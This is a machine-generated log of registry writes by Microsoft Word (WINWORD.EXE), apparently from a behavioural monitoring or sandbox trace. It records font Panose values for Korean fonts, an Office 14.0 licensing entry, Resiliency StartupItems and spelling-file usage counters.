WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

HYMyeongJo-Extra

02030600000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@HYMyeongJo-Extra

02030600000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

HYHeadLine-Medium

02030600000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@HYHeadLine-Medium

02030600000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

HYGothic-Medium

02030600000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@HYGothic-Medium

02030600000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

HYPMokGak-Bold

02030600000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@HYPMokGak-Bold

02030600000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

HYSinMyeongJo-Medium

02030600000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@HYSinMyeongJo-Medium

02030600000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

HYShortSamul-Medium

02030600000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@HYShortSamul-Medium

02030600000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

HYPost-Light

02030600000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@HYPost-Light

02030600000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

HYPost-Medium

02030600000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@HYPost-Medium

02030600000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

New Gulim

02030600000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@New Gulim

02030600000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Pyunji R

02030504000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@Pyunji R

02030504000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

MT Extra

05050102010205020202

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Licensing

019C826E445A4649A5B00BF08FCC4EEE

01000000270000007B39303134303030302D303033442D303030302D303030302D3030303030303046463143457D005A0000004F00660066006900630065002000310034002C0020004F0066006600690063006500500072006F00660065007300730069006F006E0061006C002D00520065007400610069006C002000650064006900740069006F006E000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

+th

2B746800600F000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094CD00AC200030AEA5B20000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

jth

6A746800600F000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094CD00AC200030AEA5B20000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

zth

7A746800600F000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094CD00AC200030AEA5B20000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

ith

69746800600F000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094CD00AC200030AEA5B20000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

yth

79746800600F000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094CD00AC200030AEA5B20000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

)th

29746800600F000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094CD00AC200030AEA5B20000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

8th

38746800600F000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094CD00AC200030AEA5B20000

3936

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage

SpellingAndGrammarFiles_1033

1333919846

3936

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage

SpellingAndGrammarFiles_1033

1333919847

3936

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage

SpellingAndGrammarFiles_1033

1333919848

3936

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage

SpellingAndGrammarFiles_1033

1333919849

3936

WINWORD.EXE

write